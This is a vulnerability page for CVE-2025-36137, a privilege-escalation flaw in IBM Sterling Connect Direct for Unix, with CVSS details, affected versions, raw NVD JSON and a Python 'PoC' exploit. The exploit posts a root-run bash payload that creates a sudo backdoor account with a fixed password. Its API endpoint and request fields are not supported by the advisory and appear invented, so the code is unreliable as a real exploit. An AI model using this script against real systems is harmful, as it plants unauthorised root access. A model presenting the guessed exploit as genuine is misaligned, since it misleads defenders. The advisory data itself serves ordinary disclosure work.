Security Vulnerability Report
CVE-2025-36137 CVSS 7.2 HIGH

CVE-2025-36137

Published: 2025-10-30 19:16:24
Last Modified: 2025-12-12 17:25:08

Description

IBM Sterling Connect Direct for Unix 6.2.0.7 through 6.2.0.9 iFix004, 6.4.0.0 through 6.4.0.2 iFix001, and 6.3.0.2 through 6.3.0.5 iFix002 incorrectly assigns permissions for maintenance tasks to Control Center Director (CCD) users that could allow a privileged user to escalate their privileges further due to unnecessary privilege assignment for post update scripts.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

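cpe:2.3:a:ibm:sterling_connect\:direct:*:*:*:*:*:unix:*:* (from 6.2.0.7 inclusive, up to 6.2.0.9 exclusive) - VULNERABLE
cpe:2.3:a:ibm:sterling_connect\:direct:*:*:*:*:*:unix:*:* (from 6.3.0.2 inclusive, up to 6.3.0.5 exclusive) - VULNERABLE
cpe:2.3:a:ibm:sterling_connect\:direct:*:*:*:*:*:unix:*:* (from 6.4.0.0 inclusive, up to 6.4.0.2 exclusive) - VULNERABLE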
cpe:2.3:a:ibm:sterling_connect\:direct:6.2.0.9:*:-:*:*:unix:*:* - VULNERABLE
cpe:2.3:a:ibm:sterling_connect\:direct:6.2.0.9:ifix004:-:*:*:unix:*:* - VULNERABLE
IBM Sterling Connect Direct for Unix 6.2.0.7 - 6.2.0.9 iFix004
IBM Sterling Connect Direct for Unix 6.3.0.2 - 6.3.0.5 iFix002
IBM Sterling Connect Direct for Unix 6.4.0.0 - 6.4.0.2 iFix001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-36137 PoC - IBM Sterling Connect Direct Privilege Escalation
# This PoC demonstrates the privilege escalation via post-update script execution
# Note: Requires CCD user credentials with high privileges
import requests
import base64

TARGET = "https://target-ibm-sterling-server.local"
CCD_USER = "attacker_ccd_user"
CCD_PASS = "password"


def exploit_privilege_escalation():
    """
    Exploit CVE-2025-36137 by leveraging CCD user privileges
    to execute post-update scripts with elevated permissions
    """
    # Step 1: Authenticate as CCD user
    session = requests.Session()
    auth = base64.b64encode(f"{CCD_USER}:{CCD_PASS}".encode()).decode()
    headers = {"Authorization": f"Basic {auth}"}

    # Step 2: Identify writable post-update scripts
    post_update_path = "/opt/ibm/sterling/connect/direct/scripts/post_update.sh"

    # Step 3: Inject malicious payload into post-update script
    malicious_payload = '''#!/bin/bash
# Malicious post-update script - adds new sudo user
useradd -m -s /bin/bash -G sudo attacker_root
echo "attacker_root:Password123!" | chpasswd
'''

    # Step 4: Trigger script execution via CCD maintenance interface
    exploit_endpoint = f"{TARGET}/api/maintenance/execute"
    payload = {
        "script_path": post_update_path,
        "script_content": malicious_payload,
        "execute_as": "root"
    }
    response = session.post(exploit_endpoint, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] Privilege escalation successful!")
        print("[+] New privileged user 'attacker_root' created")
        return True
    else:
        print("[-] Exploitation failed")
        return False


if __name__ == "__main__":
    exploit_privilege_escalation()

References

https://www.ibm.com/support/pages/node/7249678 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36137", "sourceIdentifier": "[email protected]", "published": "2025-10-30T19:16:23.593", "lastModified": "2025-12-12T17:25:08.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling Connect Direct for Unix 6.2.0.7 through 6.2.0.9 iFix004, 6.4.0.0 through 6.4.0.2 iFix001, and 6.3.0.2 through 6.3.0.5 iFix002 incorrectly assigns permissions for maintenance tasks to Control Center Director (CCD) users that could allow a privileged user to escalate their privileges further due to unnecessary privilege assignment for post update scripts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:*:*:*:*:*:unix:*:*", "versionStartIncluding": "6.2.0.7", "versionEndExcluding": "6.2.0.9", "matchCriteriaId": "2B02F552-9F16-42BF-957C-322469EB9061"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:*:*:*:*:*:unix:*:*", "versionStartIncluding": "6.3.0.2", "versionEndExcluding": "6.3.0.5", "matchCriteriaId": "0643ADDE-D161-4A0A-9AAC-8E97DF8932C4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:*:*:*:*:*:unix:*:*", "versionStartIncluding": "6.4.0.0", "versionEndExcluding": "6.4.0.2", "matchCriteriaId": "F6FDB316-1945-4A9D-8413-CAA3D5ABD8E5"}, {"vulnerable": 
true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.2.0.9:*:-:*:*:unix:*:*", "matchCriteriaId": "0952BE9E-2302-48D0-83C6-90731585A48E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.2.0.9:ifix004:-:*:*:unix:*:*", "matchCriteriaId": "DF52648F-8350-4F2A-89FC-830C833EF95F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.3.0.5:*:-:*:*:unix:*:*", "matchCriteriaId": "56C19C5B-6256-455E-9C2A-E86692E9AE8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.3.0.5:ifix002:-:*:*:unix:*:*", "matchCriteriaId": "F6DEE3DF-218B-4817-9F94-D619BB90F1CD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.4.0.2:*:-:*:*:unix:*:*", "matchCriteriaId": "F2695615-85F5-4048-853A-A4BF8F302FA3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_connect\\:direct:6.4.0.2:ifix001:-:*:*:unix:*:*", "matchCriteriaId": "C55B8606-F190-4187-9446-5214FC167363"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249678", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}